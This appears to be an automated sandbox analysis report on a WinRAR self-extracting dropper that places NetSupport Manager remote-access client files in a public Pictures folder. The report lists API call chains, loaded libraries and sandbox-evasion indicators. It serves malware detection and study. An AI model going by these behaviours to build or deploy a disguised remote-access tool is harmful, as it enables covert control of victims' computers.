                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110454F01_2_110454F0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1101B7601_2_1101B760
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111258B01_2_111258B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1101BBA01_2_1101BBA0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11087C601_2_11087C60
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110700901_2_11070090
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110804801_2_11080480
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1115E9801_2_1115E980
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1101C9C01_2_1101C9C0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110088AB1_2_110088AB
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11050D801_2_11050D80
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C79A9801_2_6C79A980
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7C3DB81_2_6C7C3DB8
                                Source: C:\Users\Public\Pictures\bild.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 11146450 appears 599 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 6C796F50 appears 56 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 110278E0 appears 47 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 1116F010 appears 37 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 11029450 appears 992 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 111603E3 appears 41 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 1105DD10 appears 289 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 11081BB0 appears 42 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 11164010 appears 32 times
                                Source: C:\Users\Public\Pictures\bild.exeCode function: String function: 6C7A7D00 appears 53 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0045CEC0 appears 53 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0045D870 appears 31 times
                                Source: C:\Users\user\Desktop\file.exeCode function: String function: 0045CDF0 appears 37 times
                                Source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
                                Source: file.exe, 00000000.00000003.1733526387.00000000034C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe
                                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: classification engineClassification label: mal88.rans.evad.winEXE@3/12@1/2
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11059C50 GetLastError,FormatMessageA,LocalFree,1_2_11059C50
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,1_2_1109D440
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,1_2_1109D4D0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,1_2_11115B70
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00458BD0 FindResourceW,DeleteObject,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00458BD0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,1_2_11127E10
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\__tmp_rar_sfx_access_check_5782500Jump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeMutant created: NULL
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: *xI0_2_0045C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: *aH0_2_0045C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: 8yI0_2_0045C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxname0_2_0045C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: sfxstime0_2_0045C131
                                Source: C:\Users\user\Desktop\file.exeCommand line argument: STARTDLG0_2_0045C131
                                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Windows\win.iniJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: file.exeReversingLabs: Detection: 50%
                                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Pictures\bild.exe "C:\Users\Public\Pictures\bild.exe"
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\Public\Pictures\bild.exe "C:\Users\Public\Pictures\bild.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: dbghelp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: dbgcore.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: wbemcomn.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: riched32.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: riched20.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: usp10.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: firewallapi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: fwbase.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: dhcpcsvc.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile written: C:\Users\Public\Pictures\client32.iniJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: file.exeStatic file information: File size 2137944 > 1048576
                                Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\Public\Pictures\msvcr100.dllJump to behavior
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
                                Source: Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000001.00000002.4180868300.000000006C981000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000001.00000002.4181166197.000000006D122000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000001.00000000.1735795513.0000000000222000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.1733526387.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000001.00000002.4181039734.000000006D105000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,1_2_11029590
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\__tmp_rar_sfx_access_check_5782500Jump to behavior
                                Source: PCICL32.DLL.0.drStatic PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045D8B6 push ecx; ret 0_2_0045D8C9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045CDF0 push eax; ret 0_2_0045CE0E
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1116F055 push ecx; ret 1_2_1116F068
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11169F49 push ecx; ret 1_2_11169F5C
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11040E01 push 3BFFFFFEh; ret 1_2_11040E06
                                Source: msvcr100.dll.0.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\pcicapi.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\msvcr100.dllJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\bild.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\PCICHEK.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\Public\Pictures\PCICL32.DLLJump to dropped file
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7A7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,1_2_6C7A7030
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,1_2_11127E10
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,1_2_11139090
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,1_2_1115B1D0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,1_2_11113290
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB2B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,1_2_110CB2B0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,1_2_110254A0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,1_2_110258F0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,1_2_11023BA0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,1_2_11024280
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11112670 IsIconic,GetTickCount,1_2_11112670
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111229D0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,1_2_111229D0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,1_2_110C0BB0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,1_2_1115ADD0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,1_2_1115ADD0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_11143570
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7991F01_2_6C7991F0
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7A4F301_2_6C7A4F30
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_110B8200 Sleep,ExitProcess,1_2_110B8200
                                Source: C:\Users\Public\Pictures\bild.exeWindow / User API: threadDelayed 424Jump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeWindow / User API: threadDelayed 8034Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Pictures\remcmdstub.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Pictures\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\Public\Pictures\HTCTL32.DLLJump to dropped file
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-76009
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-77890
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-77207
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-81126
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-80727
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-81288
                                Source: C:\Users\Public\Pictures\bild.exeEvaded block: after key decisiongraph_1-81304
                                Source: C:\Users\Public\Pictures\bild.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_1-80866
                                Source: C:\Users\Public\Pictures\bild.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-80658
                                Source: C:\Users\Public\Pictures\bild.exeAPI coverage: 6.4 %
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7A4F301_2_6C7A4F30
                                Source: C:\Users\Public\Pictures\bild.exe TID: 7744Thread sleep time: -62750s >= -30000sJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exe TID: 7748Thread sleep time: -42400s >= -30000sJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exe TID: 7744Thread sleep time: -2008500s >= -30000sJump to behavior
                                Source: C:\Users\Public\Pictures\bild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Users\Public\Pictures\bild.exeLast function: Thread delayed
                                Source: C:\Users\Public\Pictures\bild.exeCode function: 1_2_6C7A3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C7A3226h1_2_6C7A3130
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044A273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0044A273
